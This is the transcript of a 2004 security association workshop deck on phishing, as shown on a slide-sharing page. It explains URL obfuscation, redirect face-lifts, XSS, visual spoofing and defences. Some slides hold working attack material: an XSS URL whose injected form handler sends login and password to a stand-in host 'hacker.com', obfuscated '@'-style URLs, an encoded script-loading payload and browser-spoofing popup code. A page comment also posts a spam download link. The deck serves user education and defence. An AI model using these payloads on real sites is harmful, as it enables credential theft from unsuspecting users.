• Like
Phishing exposed
Upcoming SlideShare
Loading in...5
×

Phishing exposed

  • 8,527 views
Uploaded on

 

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
  • Can't see half of the slides. Poor presentation.
    Are you sure you want to
    Your message goes here
  • free free download this latest version 100% working.
    download link- http://gg.gg/hqcf
    Are you sure you want to
    Your message goes here
No Downloads

Views

Total Views
8,527
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
150
Comments
2
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Supported by Computer Studies Division, City University of Hong Kong
  • 2. Presented by Mr. Alan Lam Mr. Bernard Kan Mr. S.C. Leung2 (PHISHING )
  • 3. Disclaimer • This material is NOT intended to be adopted in the course of attacking any computing system, nor does it encourage such act. • PISA takes no liability to any act of the user or damage caused in making use of this report. • The points made here are deliberately kept concise for the purpose of presentation. If you require technical details please refer to other technical references.3 (PHISHING )
  • 4. Copyright • The copyright of this material belongs to the Professional Information Security Association (PISA). • A third party could use this material for non-commercial purpose, given that no change in the meaning or interpretation of the content was made and reference is made to PISA. All rights are reserved by PISA.4 (PHISHING )
  • 5. Agenda 1. Overview of Phishing ? 1.1 What is Phishing? 1.2 Examples of Phishing .. email, web site 1.3 Current Profile of Phishing Attack 2. Attack Strategies & Technologies and Defenses 2.1 Cousin URL Attack 2.2 URL Obfuscation Attack 2.3 Face Lift Attack 2.4 Cross-site Scripting Attack 2.5 Visual Spoofing Attacks 2.6 Other Attacks 3. Defense Strategies Against Phishing Attack 3.1 Policy and User Education 3.2 Prevention 3.3 Detection 3.4 Incident Response and Collaboration5 3.5 Long Term Dev’t in technology infrastructure and legislation (PHISHING )
  • 6. 1.1 What is Phishing? Phishing attacks use spoofed e-mails and fraudulent websites designed to fool recipients into divulging personal financial data such as credit card numbers, account usernames and passwords, social security numbers, etc. Quoted from http://www.antiphishing.org6 (PHISHING )
  • 7. Origin of Term • Phreaking + Fishing = Phishing • Phreaking: exploiting vulnerability of phone system to make calls without paying in the 70’s • Fishing : Use of bait to get target on hook •7 (PHISHING )
  • 8. Why Phishing becomes a threat to us? • Online transaction, such as e-banking, becomes more and more popular – Versign July 2004 report: eCommerce yearly increase by 13.2% • In order to make their online transaction service easy to use an please their d customers, some service providers sacrifice good security feature, such as user certificate. • Fantasy web features (DHTML, Java, ActiveX, Flash, XML) introduce new web vulnerabilities which may not be caught up by most service providers and browser vendors. And these web features are supported by most email/newsreaders, search engines, chat rooms, or ICQ. • Spamming technology and facilities are becoming mature. Legislation in this area cannot catch up. • Internet being a Virtual World, it lacks a physical identity for user to validate. Trust building is an intrinsic problem. • The current Internet infrastructure is insecure by default. • It is much cheaper and safer for attackers to carry out fraud in the Internet. • All the above points encourage attackers to gain financial profit by Phishing attack.8 (PHISHING )
  • 9. How does Phishing work? • Social engineering used in the crafted Spam email and Fake web site – Use spoofed identity (of trusted organization) to gain trust – Use the wording and tune that the trusted organization usually uses – Emphasize an urgency to “update” or “validate” data to rectify problem – Threaten to terminate account or process the mistaken transaction – Inform user to get free coupon or win lottery because of product promotion • Luring victim to a bogus website (the net in fishing) – Convincing URL – Disguised web interface • Make the bogus web site look like the original web site. • Detail level down to fonts, company logo, or even the browser UI – When users login the bogus website, username and password are captured.9 (PHISHING )
  • 10. Workflow of Phishing Attack 1. Preparation a. Research and Development • Identify the target organization • Identify the vulnerability of the target organization web page • Iidentify the vulnerability of email reader and web browser that can facilitate the attack b. Prepare scam email and Capture website according to the above collected information c. Gather or purchase email addresses d. Ride on SMTP Open Relay or purchase similar services 2. Attacking a. Send out scam mail (the bait) via open relay server / services b. Post the scam mail to newsgroups, chartrooms, ICQ messages or Banner advertising c. Submit the bogus website to search engines d. Wait for victim at the Capture Website (the trapping net) 3. Harvesting a. Capture data collected at Capture Website b. Use or Sell the data or captured hosts…10 (PHISHING )
  • 11. Phishing Categories Attackers’ Objectives – Fraud in money transfer – Fraud in personal information theft – Installing Key Logger and Trojan for other purposes such as proxy for other attacks Loss and Damage – Financial – Leakage of sensitive information – Control of computer fallen to attacker – Damage to branding and corporate image – Damage to consumer confidence in online transaction and eventually impact Image Source: www.jcsbank.com/ phishing.html development of e-Commerce11 (PHISHING )
  • 12. Demonstration 1 Examples of Phishing PayPal Ebay Hang Seng Bank HSBC Citibank US Bank SunTrust Bank Citizens Bank12 (PHISHING )
  • 13. 1.3 Current Profile of Phishing Attack References • Verisign Internet Intelligence Briefing (2004-07) – http://www.verisign.com/stellent/groups/public/documents/white_paper/00 6583.pdf • Anti-Phishing Working Group (APWG) Trend Report (2004-06) – http://www.antiphishing.org/APWG_Phishing_Attack_Report-Jun2004.pdf • Gartner Report (2004-06) – Internet Banking Fraud had brought about loss of US$2.4B – http://www.itu.int/osg/spu/newslog/categories/indicatorsAndStatistics/2004 /06/21.html#a692 • Hong Kong Police Statistics (2004-07)13 (PHISHING )
  • 14. Anti-Phishing Working Group Trend Report (2004-06) Monthly Unique phishing attacks 1500 1422 1125 1197 Count of unique 1000 attacks 402 500 282 176 0 Jan-04 Feb-04 Mar-04 Apr-04 May-04 Jun-04 Month14 (PHISHING )
  • 15. Phishing Attack Target (APWG 2004-06) 1. Citibank 2. eBay 3. US Bank 4. Pay Pal 12 VISA 17. HSBC15 (PHISHING )
  • 16. Phishing Web site location Verisign (2004-07) APWG (2004-06) Verisign APWG Country Percentage Country Percentage USA 63 USA 27 South Korea 10 South Korea 20 Mainland China 5 Mainland China 16 Brazil 2 Taiwan 7 Poland 2 Holland 3 • Phishermen usually choose location (APWG 2004-06) – Where there is language or time zone difference with brand owner, to create the barrier to close down the bogus web site – On compromised machines (25% by analysis)16 (PHISHING )
  • 17. Phishing Sender Source • Verisign (2004-07) • APWG (2004-06) 2% 5% 1% 7% 92% 93% Spoofed Address Spoofed Address Cousin Address Cousin Address Web Email Address Web Email Address17 (PHISHING )
  • 18. Phishing impact can be great • Impact to USA (Gartner Report 2004-06) – 57 million US consumers attacked – 3-5% recipients became victims – About 1.98 million reported their account intruded – Loss involved was US$2.4 billion (average loss per victim US$1,200)18 (PHISHING )
  • 19. Phishing and Bogus Website in Hong Kong Phishing and Bogus Website Report 50 45 Reported Cases 40 36 30 30 28 25 20 14 10 3 3 4 4 3 4 1 2 1 2 2 2 0 0 0 0 0 1 1 1 0 04 3 3 03 04 3 4 4 3 4 4 3 3 v-0 l-0 p-0 b-0 r-0 g-0 r-0 -0 c-0 t-0 n- n- n- Ju ay Ma Ap No Oc Ju De Ju Ja Fe Se Au M Phishing Report Bogus Website Source: Hong Kong Police Force19 (PHISHING )
  • 20. 2. Attack Strategies and Technologies • Before 2003, Social Engineering was the major attack – Email with impersonated name and logo, together with disguised tone of messages – Two technical tricks were also used • Cousin URL carry similar • Bogus URL using old techniques • Since 2003, technologies emerged to trick the browser, or even mimic the SSL web page style • Face Lift • Bogus URL using new techniques • Cross-site Scripting • Visual Spoofing • Other attacks20 (PHISHING )
  • 21. 2.1 Cousin URL Hong Kong Banking Some Cousin URL as example Bogus Websites (Red: Bogus Cousin URL) 2003 (Jan-Dec) 8 cases • ? ? ? ? (www.hkbea.com) 2004 (Jan - Jul) 18 cases • www.eastasiacredit.com • www.onlinebea.com • ? ? ? ? (www.hsbc.com) • www.hkhsbc.com • ? ? ? ? (hk.dbs.com) • www.dbshk.net • ? ? ? ? (www.standardchartered.com) • www.scbltd.com • ? ? ? ? (www.dahsing.com) • www.dasxin.com • www.dlfh.com • ? ? ? ? (www.iba.com.hk) • www.ibabankhk.com Source: • www.hkiba.com Hong Kong Police Force • More…21 (PHISHING )
  • 22. Cousin URL: https://visa-secure.com/personal/secure_with_visa/22 (PHISHING )
  • 23. 2.2 URL Obfuscation Attack • Normal representation of URL – Domain: http://www.pisa.org.hk • Dotted representation of IP address URL – Decimal: http://202.81.255.242 – Hexadecimal: http://0xca.0x51.0xff.0xf2 – Octal http://0312.0121.0377.0362 • Dot-less representation of IP address URL – Decimal: http://3639552355 http://7689338866 … – Hexadecimal: http://0xCA51FFF2 – Reference: A dot-less Decimal IP calculator can be found at http://www.tcp-ip.nu/cgi-bin/tcp-ip/calc.cgi23 (PHISHING )
  • 24. 2.2 URL Obfuscation Attack • Valid Use of “@’ – “RFC1738 - URL”? ”RFC2396 – URI Generic Syntax” allows a valid Uniform Resource Locators (URL) syntax <user>:<password>@<host>:<port>/<url-path> – Application: use URL to carry username and password, e.g. • ftp://user1:pass@myftp.com:1021/public/file1.gzip • Malicious Use of “@’ to hide bogus host – http://www.microsoft.com@www.pisa.org.hk – http://www.microsoft.com@202.81.255.242 (IP address) – http://www.microsoft.com@3394371570 (decimal representation) – http://www.microsoft.com111111111111111111111111111111111111 11111111111111111111111@3394371570 • Browser’s Address bar and Status bar CAN DISPLAY the actual content but normal user may not notice24 (PHISHING )
  • 25. 2.2 URL Obfuscation Attack • Escaped Encoding (or % encoding) – RFC1738 - URL”? ”RFC2396 – URI Generic Syntax” allows URL encoded as ASCII in Hexadecimal representation – ”%##” (## : 00 – FF) • %20= [space], %2E=“.”, %7E=“~” • %31=“1”, %32=“2” • %41=“A”, %61=“a” – Where will this URL bring you to? • http://www.microsoft.com@%79%61%68%6F%6F%2E%63%6F%6D http://www.microsoft.com@yahoo.com • Browser’s Address bar and Status bar CAN DISPLAY the actual content but normal user may not notice • Reference of % Encoding and online encode/decoder http://www.blooberry.com/indexdot/html/topics/urlencoding.htm25 (PHISHING )
  • 26. 2.2 URL Obfuscation Attack • Other derived formats of URI – Unicode encoded URL • Unicode was designed to allow multiple language implementations of the ASCII character set • http://&#119;&#119;&#119;&#46;&#112;&#105;&#115;&#97;& #46;&#111;&#114;&#103;&#46;&#104;&#107; – Mixed Unicode and ASCII • http://&#119;&#119;&#119;%2E%70%69%73%61%2E%6F%72%6 7%2E%68%6B • References Unicode Encoding: http://www.unicode.org/ Free Online UTF Decoder (choose “Freeform numeric): http://software.hixie.ch/utilities/cgi/unicode-decoder/utf8-decoder26 (PHISHING )
  • 27. 2.2 URL Obfuscation Attack • IE or other browser Vulnerability in displaying proper URL at – Status Bar – Address Bar27 (PHISHING )
  • 28. URL Obfuscation Attack (Status Bar) • Inline Javascript – <A Href= … onMouseOver=..> • <Form> • <Table> • <Table Border> • <Image Map>28 (PHISHING )
  • 29. URL Obfuscation Attack (Address Bar) (IE vulnerability in displaying URL) • IE 5.x ? 6.0 has a vulnerability in handling URL. When the URL contains special characters, the character string after the special character cannot be displayed. (Microsoft knowledgebase article 834489) • For example, use escaped encoded characters %00 (null character) and %01 – http://www.yahoo.com%01%00@www.pisa.org.hk – http://www.yahoo.com%01%00@202.81.255.242 – http://www.yahoo.com%01%00@3394371570 • IE will bring user to “www.pisa.org.hk”, whereas the Address bar and Status bar cannot display the true visited URL!29 (PHISHING )
  • 30. IE vulnerability in displaying URL • MS04-004 (2004-02) released a patch to remove support in HTTP to the URI format <user>:<password>@ <host>:<port>/<url-path> http://www.microsoft.com/technet/s ecurity/Bulletin/MS04-004.asp • However, after applying the patch, Address bar and Status bar still do NOT display the correct URL.30 (PHISHING )
  • 31. Known Attack using the MS04-004 • Exploit-URLSpoof Trojan • McAfee alert http://vil.nai.com/vil/cont ent/v_100927.htm31 (PHISHING )
  • 32. IE vulnerability in handling URL • Works with DNS server which accepts dummy subdomain, e.g. http-equiv.dyndns.org • http://www.microsoft.com.technet.security.bulletin.MS04- 029.mspx.12345.123451234512345678901234567123456789 0123456789.box&&cm=&ce=3&hl=malware.http- equiv.dyndns.org/~http-equiv/mwaresoft.html Effective = *.http-equiv.dyndns.org/~http-equiv/mwaresoft.html • Reference URL: http://www.malware.com/malwaresoft.html32 (PHISHING )
  • 33. 2.2 URL Obfuscation Attack • Shortened URL – http://www.rapp.org/url/ • PISA http://www.rapp.org/url/?IUVST6C8 • Workshop: Phishing Exposed http://www.rapp.org/url/?KRRQ7YYH – http://csua.org/u/ • PISA http://csua.org/u/9fy • Workshop: Phishing Exposed http://csua.org/u/9iu33 (PHISHING )
  • 34. Demonstration 2 URL Obfuscation Attacks34 (PHISHING )
  • 35. 2.3 Face Lift ( ) • Use URL Redirect or similar technology • Take advantage of the real web site’s face to confuse the identity of Bogus Login Page <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/"> Online Banking Main Page (real) Online Login (bogus) Usename myuserid Password *******35 (PHISHING )
  • 36. Case Study ANZ bank phishing Email content : : “%##” Hexidecimal format : http://anz.com.au%32inetbank%32%32%32@%36%31%2E%31%30%2E%31%32 : %30%2E%32%30%30 %32%37%38%34/%69%6E%65%74%62%61%6E%6B/%6 9%6E%64%65%78%2E%68%74%6D Bogus URL – old technique http://anz.com.au2inetbank222 @61.10.120.200:2784/inetbank/index.htm36 (PHISHING )
  • 37. Content of BOGUS web page “http://61.10.120.200:2784/inetbank/index.htm” : <script LANGUAGE="JavaScript"> : SafeAddOnload(PUWStart); 1 PopUp page Login gPopupWindow = new PopupWindow("login.htm", 350, 150); gPopupWindow.toolbar = false; gPopupWindow.statusbar = true; gPopupWindow.resizable = true; gPopupWindow.ontop = true; </script> </head> <body bgcolor="#FFFFFF" text="#000000"> 2 Background Redirect <META HTTP-EQUIV="Refresh" CONTENT="0;37 url=http://www.anz.com.au/"> (PHISHING )
  • 38. Online Banking Login (Bogus) 1 PopUp page Login No SSL 2 Background Redirect <META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.anz.com.au/">38 (PHISHING )
  • 39. Case Study ANZ bank phishing Face Lift 2 2 1 userid ********39 (PHISHING )
  • 40. Case Study ANZ bank phishing Track Hiding After entering PIN SSL padlock shown ??!!40 (PHISHING )
  • 41. Online Banking Login (real) Real digital cert of web site Real login has SSL padlock41 (PHISHING )
  • 42. Defense vs. Cousin URL (Prevention) • Use a consistent and persistent web interface • Communicate a Single Simple Domain name XYZBank owns these domains and have web servers for each xyzbank.com xyzcorp.com xyzgroup.com They use these domains for Online banking online-xyzbank.com secure-xyzbank.com They use these domains for HK and Australia Online banking online-xyzbank.com.hk secure-xyzbank.com.au42 (PHISHING )
  • 43. Defense vs. Cousin URL (Prevention) • Is this better? XYZBank owns these domains xyzbank.com (only active domain) xyzcorp.com (forward to xyzbank.com) xyzgroup.com (forward to xyzbank.com) They these SubDomain for Online banking online.xyzbank.com (personal banking) secure.xyzbank.com (corporate banking) They use these URL paths for HK and Australia Online banking online.xyzbank.com/hk/ secure.xyybank.com/au/43 (PHISHING )
  • 44. Defense vs. Cousin URL (Detection) • Brand Management • Domain Monitoring Can be Outsourced • Web Crawling • Intelligence Report from Spam Filtering services44 (PHISHING )
  • 45. Detection (Server side) • Detect Mirroring from Copycat Web Site – Monitor large volume traffic, especially from a single subnet – Placing Honeypot links (invisible links with no effective use) to detect access check “access log” • Detect Referral Site – At your web server monitor the referrer information from the “access log”, it may give you information of referral site, search engine or attacker by FaceLift / Framing /etc. attack45 (PHISHING )
  • 46. Server and Site Design Reference • PISA’s HK e-Commerce Security Survey 2003 – Non-intrusive and Anonymous study on 25 local on-line transaction sites • Application design • SSL and Encrypted Communication Digital Certificate Implementation • Password Management • Operation Control – URL • http://www.pisa.org.hk/projects/websec2003/websec2003.htm46 (PHISHING )
  • 47. Detection (Client side) • Browser – check digital certificate; and turn on alert when browser enters or leaves SSL mode47 (PHISHING )
  • 48. Detection (Client side) • SpoofStick (browser • eBay Toolbar (browser plug-in) plug-in – Incorporated “Web CallerID” technology (acquired from WholeSecurity) to detect suspicious activity in web page. Web CallerID acts like a heuristic filter for phishers, detecting previously undiscovered spam • http://www.eweek.com/art icle2/0,1759,1636422,00.a sp48 (PHISHING )
  • 49. Detection (Client) • Some Antivirus programs detect malicious popup javascript in web page49 (PHISHING )
  • 50. Detection (Client) • http://%32%31%31%2E%39%37%2E%32%34%38%2E%36 %30:%38%37/%63%69%74/%69%6E%64%65%78%2E%68 %74%6D ( http://211.97.248.60:87/cit/confirm.htm)50 (PHISHING )
  • 51. 2.4 Cross-Site Scripting • A cross-site scripting vulnerability allows the introduction of malicious content (scripts) on a web site, that is then served to users (clients) – Malicious scripts get executed on clients that trust the web site – Problem with potentially all client-side scripting languages • Use “XSS” to refer to these vulnerabilities, to avoid confusion with “CSS” (cascading style sheets)51 (PHISHING )
  • 52. XSS Concept • Any way to fool a legitimate web site to send malicious code to a user’s browser • Almost always involves user content (third party) – Error messages – User comments – Links • References – http://www.cert.org/archive/pdf/cross_site_scripting.pdf – http://www.spidynamics.com/support/whitepapers/SPIcross -sitescripting.pdf52 (PHISHING )
  • 53. Why the Name • You think that you interact with site Z • Site Z has been poisoned by attacker • The “poison” (e.g. JavaScript) is sent to you, along with legitimate content, and executes. It can exploit browser vulnerabilities, or contact site M and steal your cookies, usernames and passwords... Z Surfing Poison Poison Hostile Code Executes M53 (PHISHING )
  • 54. XSS Risks • Theft of account credentials and services • User tracking (stalking) and statistics • Misinformation from a trusted site • Denial of service • Exploitation of web browser – Create phony user interface – Exploit a bug in the browser – Exploit a bug in a browser extension such as Flash or Java • Etc.54 (PHISHING )
  • 55. XSS Risks - Stolen Account Credentials • With XSS, it may be possible for your credentials to be stolen and used by attacker • With sites requiring authentication need to use a technological solution to prevent continuously asking users for passwords – Credentials have the form of a SessionID or nonce • Url encoding (GET method) – http://www.site.com?ID=34539027644 • Cookies are commonly used to store credentials – These are usually accessible to client-side scripts55 (PHISHING )
  • 56. Cookie Mechanism and Vulnerabilities • Used to store state on the client browser • Access Control – Includes specification of which servers can access the cookie (a basic access control) • Including a path on the server – So cookie can be used to store secrets (sessionIDs or nonces)56 (PHISHING )
  • 57. XSS - Point • XSS vulnerabilities fool the access control mechanism for cookies • The request for the cookie (by scripts) comes from the poisoned server, and so is honored by the client browser – No vulnerabilities needed in the client browser57 (PHISHING )
  • 58. XSS Risk - Privacy and Misinformation • Scripts can “spy” on what you do – Access history of sites visited – Track content you post to a web site • Scripts can misinform – Modify the web page you are viewing – Modify content that you post • Privacy (“I have nothing to hide”) – Knowledge about you can be valuable and be sued against you • Divorces, religion, hobbies, opinions • etc.58 (PHISHING )
  • 59. Example: Google’s XSS Vulnerability • Just get to public at Oct 20. • Scripts can be injected into Google to make it become a subscription service: – http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%7 0%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75 %6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28% 64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65 %6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73% 72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69 %6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%2759 (PHISHING )
  • 60. Example: Google’s XSS Vulnerability60 (PHISHING )
  • 61. XSS Risk - Denial of Service • Nasty JavaScripts can make your web site inaccessible – Make browsers crash or become inoperable – Redirect browsers to other web sites61 (PHISHING )
  • 62. XSS Risk - Silent Install • Exploitation of browser vulnerabilities – JavaScript, ActiveX, etc. allow the exploitation of browser vulnerabilities • Run locally on your machine • User security confirmation bypass vulnerability in Microsoft Internet Explorer 6.0 SP2: – http://securityfocus.com/bid/11200/ – Allows malicious users to trivially bypass the requirement for user confirmation to load JavaScript or ActiveX – Installation of malicious code62 (PHISHING )
  • 63. XSS Risk - Phishing • User Interface Modifications – Present fake authentication dialogs, capture information then perhaps redirect user to real web site – Replace location toolbar to make user think they are visiting a certain web site • Phishing Scenario • Victim logs into a web site • Attacker has spread “mines” using an XSS vulnerability • Victim stumbles upon an XSS mine • Victim gets a message saying that their session has expired, and they need to authenticate again • Victim’s username and password are sent to attacker63 (PHISHING )
  • 64. Demonstration 3 - www.pisabank.com64 (PHISHING )
  • 65. After successful user login...65 (PHISHING )
  • 66. However, if login failed...66 (PHISHING )
  • 67. Try to put scripts in URL...67 (PHISHING )
  • 68. Reveal the injected scripts...68 (PHISHING )
  • 69. Target to inject codes like this...69 (PHISHING )
  • 70. We create the following url... • http://www.pisabank.com/banklogin.jsp?serviceName=PisabankCaastAcce ss&templateName=prod_sel.forte&source=Pisabank&AD_REFERRING_ URL=http://www.pisabank.com&err=%3C/form%3E%3Cform%20action= %22login1.asp%22%20method=%22post%22%20onsubmit=%22XSSimag e%20=%20new%20Image;XSSimage.src=http://www.hacker.com/%20% 2b%20document.forms(2).login.value%20%2b%20:%20%2b%20docume nt.forms(2).password.value;%22%3E70 (PHISHING )
  • 71. Put the url in scam mails...71 (PHISHING )
  • 72. When the hyperlink is clicked...72 (PHISHING )
  • 73. After the user login, nothing special...73 (PHISHING )
  • 74. However... • In www.hacker.com’s web server log, login name and password are recorded – 192.168.0.1 - - [14/Oct/2004:11:01:52 +0800] "GET /bernard:IlovePisa HTTP/1.1" 404 71974 (PHISHING )
  • 75. XSS - Prevention • For users: – disable scripting in browser (some personal firewall can selectively block/allow scripts from particular web sites) – do not trust links in e-mails, type url directly in browser – always logout before browsing elsewhere – keep up with web browser patches and versions75 (PHISHING )
  • 76. XSS - Prevention • For administrators/developers: – User input should be parsed and filtered properly, especially < > “ ‘ % ; ) ( & + - – Some decent guidelines for input filtering can be found in the OWASP Requirements document "OWASP Guide to Building Secure Web Applications and Web Services“ • http://www.owasp.org/documentation/guide.html – Output based on Input parameters should be encoded into ISO 8859 -1 for special characters • http://www.cert.org/advisories/CA-2000-02.html76 (PHISHING )
  • 77. XSS - Prevention • For administrators/developers: – For cookies: set the HttpOnly flag. Scripts that run in a browser can’t access cookie values with flag set – Keep up with web server patches – periodically test for XSS vulnerabilities by using web application scanners • e.g. Web Scarab http://www.owasp.org/software/webscarab.html77 (PHISHING )
  • 78. XSS - Detection • XSS exploits can be detected by reviewing web server access log, e.g.: 192.168.1.152 - - [14/Oct/2004:10:38:11 +0800] "GET /banklogin.jsp?serviceName=PisabankCaastAccess&templateName=prod_sel.forte &source=Pisabank&AD_REFERRING_URL=http://www.pisabank.com&err=%3C/form%3E% 3Cform%20action=%22login1.jsp%22%20method=%22post%22%20onsubmit=%22XSSimag e%20=%20new%20Image;XSSimage.src=http://www.hacker.com/%20%2b%20document .forms(2).login.value%20%2b%20:%20%2b%20document.forms(2).password.value ;%22%3E HTTP/1.1" 200 405878 (PHISHING )
  • 79. XSS - Detection • XSS exploits can also be detected by network- based Intrusion Detection System (IDS), e.g. [**] WEB-MISC cross site scripting attempt [**] 10/21-23:04:54.960511 192.168.1.152:3341 -> 192.168.1.100:80 TCP TTL:128 TOS:0x0 ID:28082 IpLen:20 DgmLen:307 DF ***AP*** Seq: 0xAB1F9A5C Ack: 0xEFB2E94B Win: 0x4470 TcpLen: 20 47 45 54 20 2F 62 61 6E 6B 6C 6F 67 69 6E 2E 6A GET /banklogin.j 73 70 3F 65 72 72 3D 3C 73 63 72 69 70 74 3E 61 sp?err=<script>a 6C 65 72 74 28 27 58 53 53 27 29 3C 2F 73 63 72 lert(XSS)</scr 69 70 74 3E 20 48 54 54 50 2F 31 2E 31 0D 0A 41 ipt> HTTP/1.1..A 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 ccept: */*..Acce 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D pt-Language: zh- 68 6B 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 hk..User-Agent: 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D Mozilla/4.0 (com 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E patible; MSIE 6. 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 0; Windows NT 5. 30 29 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 70 69 0)..Host: www.pi 73 61 62 61 6E 6B 2E 63 6F 6D 0D 0A 43 6F 6E 6E sabank.com..Conn 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 ection: Keep-Ali 76 65 0D 0A 43 6F 6F 6B 69 65 3A 20 4A 53 45 53 ve..Cookie: JSES 53 49 4F 4E 49 44 3D 32 42 43 43 39 44 45 36 43 SIONID=2BCC9DE6C 44 43 46 45 44 44 37 45 32 35 42 43 46 33 44 36 DCFEDD7E25BCF3D6 38 39 35 38 30 46 32 0D 0A 0D 0A 89580F2.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+79 (PHISHING )
  • 80. 2.5 Visual spoofing • Target to the web browser interface • Display fake menu bar, status bar, dialogue box on a web browser – The address bar displays the fake URL address – The status bar shows displays the golden “lock” icon indicating a secure SSL session, which has often been cited as a differentiator between legitimate sites and scams – The download or installation dialogue box shows fake information80 (PHISHING )
  • 81. How it works? Graphic substitution approach 1. The bogus web page are opened without the menu bar and status bar window.open(“bogus.htm", "_blank", "height=700, width=683, location=no, menubar=no, toolbar=no, status=no, resizable=no, scrollbars=no"); 2. The menu bar and status bar (with the golden “lock” icon) images are displayed at the top and bottom of the bogus web page to disguise as part of the browser user interface81 (PHISHING )
  • 82. Graphic Substitution Approach Header image Bogus web content Footer image82 (PHISHING )
  • 83. Graphic Substitution Approach 3. Combine with the java commands “window.createPopup()” and “popup.show()”, attacker can hijack the entire user’s desktop and construct a fake interface to capture and manipulate what the user sees. op=window.createPopup(); op.document.body.innerHTML="...html..."; op.show(0,0,screen.width,screen.height,document.body);83 (PHISHING )
  • 84. Browser UI Rebuild Approach 1. The bogus web page are opened without the menu bar and status bar 2. Some browser user interface functions (including the certification view function) are rebuilt on the bogus web page through download XUL (XML- based User interface Language. Standards based language developed by mozilla.org to create cross- platform user interfaces for Mozilla-based products such as the browser.) Reference: http://www.nd.edu/~jsmith30/xul/test/spoof.html84 (PHISHING )
  • 85. Browser UI Rebuild Approach85 (PHISHING )
  • 86. Overriding Page Content Approach • IE browser allows creation of chromeless windows which are screen objects that do not have the normal borders and other controls attached to them. Through javascript, they can be positioned to hide or replace (by “sitting on top”) underlying content. • Attackers make use of these chromeless windows to spoof the graphical components of browser, such as URL address bar and dialogue boxes for file download, software installation, and bookmark.86 (PHISHING )
  • 87. 2.5 Visual spoofing • Defense – Keep your web browser updated – Disable the javascript functions which hide your web browser menu and status bar – Check the page info and property of the view web page before proceed – Print mark browser UI87 (PHISHING )
  • 88. Demonstration 4 Visual Spoofing Graphical Substitution FireFox Browser UI Rebuild Approach Chromeless Window88 (PHISHING )
  • 89. 2.6 Other Attack Trojan, Keylogger, Screen Grabber Attacker can lure victim to install Trojan horse program through a bogus software patch or update web page. Once the victim has installed the Trojan horse program, the attacker can closely monitor the victim PC activities by capturing its keystroke and screen display. – Keylogger • Capture the victim keystroke in all windows – Screen Grabber • Screen dump or even video stream the victim screen display89 (PHISHING )
  • 90. Demonstration 5 Keylogger and Screen Grabber Using BackOrifice90 (PHISHING )
  • 91. 2.6 Other Attack Man in the Middle Attack By poisoning the victim DNS server, attacker can redirect the traffic of a legitimate site to the attacker server where the attacker can sniff password information even in the HTTPS connection. Legitimate web server The victim thought that he is talking to the legitimate site Victim PC Actually, the victim is talking to the attack server Attacker server which sniff the password information and proxy the HTTPS traffic between the victim and legitimate web server91 (PHISHING )
  • 92. New Quiet Attack (4-Nov-2004) • Change of HOST file – Capture online banking details WITHOUT requiring users to click on a website link – Works even if USER TYPE IN URL MANUALLY – Working Principle • Execution of trojan to modify HOSTS file • HOSTS file override DNS resolution • User brought to malicious site next time he go to that online transaction site. • Defense – Ensure Windows Scripting Host is disabled – Have AV and antispyware software installed • Reference: http://www.vnunet.com/news/115917192 (PHISHING )
  • 93. Defense Strategies At end user side • NEVER follow any link in e-mail, post article, chart room, ICQ message, or Banner advertising • Enable your personal firewall to allow only necessary traffic to go through • Keep your software (mail reader, web browser, virus definition) patched and updated • Use the PKI properly93 (PHISHING )
  • 94. Defense Strategies At server side • Make sure the web programs are fully tested such as input parsing and invalid input handling • Monitor any cousin domain created • Monitor any phishing e-mail or post message that targeting your organization in major search engines and your Honeypot accounts • Monitor your web server log and identify any suspicious web pages from the referer information • Provide secure web proxy service for their customers. This web proxy can only connect their legitimate web sites and nothing else • Provide secondary authentication for transaction. E.G. send one-time password to client through mobile SMS94 (PHISHING )
  • 95. Defense Strategies At system and network admin side • Deploy anti-spamming and anti-virus measures E.G. Black/white lists, keywords lists, semantics analysis, various rules and characteristics, Bayesian Filtering, Challenge-Response Filtering, SMTP Session Verification, TurnTideT Anti-spam Router … etc. • Deploy Firewall, Intrusion Detection System and Intrusion Prevention System to block attack and Trojan backdoor connections • Put all non-server machines in private IP networks • Educate the users and make sure they stay with the updated software patch At the software vendor side • Do not assume users have certain security knowledge or awareness to use their products safety and wisely • Do not lower the security level in their product default setting • Don’t just make money. Spend more time to fix the bug and fully test the product95 (PHISHING )
  • 96. The Picture of Trust Perception - Social engg. Look and Feel - Cousin URL Message and Tone - Face Lift Trust Branding Trust Physical Settings CA Weak Weak Operation? Operational Security Validation Chain of Trust Certificate & Revocation Email Sender Validation XSS Vulnerabilities Application Application Apps Visual *Browser* Transport (Host) Spoofing SSL Transport MITM, Network (Internet) DNS, Hosts file Network Routing DNS poison Network MITM, Link (LAN) ARP Sniffing Link Resolution Client IT Infrastructure Server96 (PHISHING )
  • 97. Defense Strategies • Policy and User Education • Prevention • Detection • Incident Response and Collaboration97 (PHISHING )
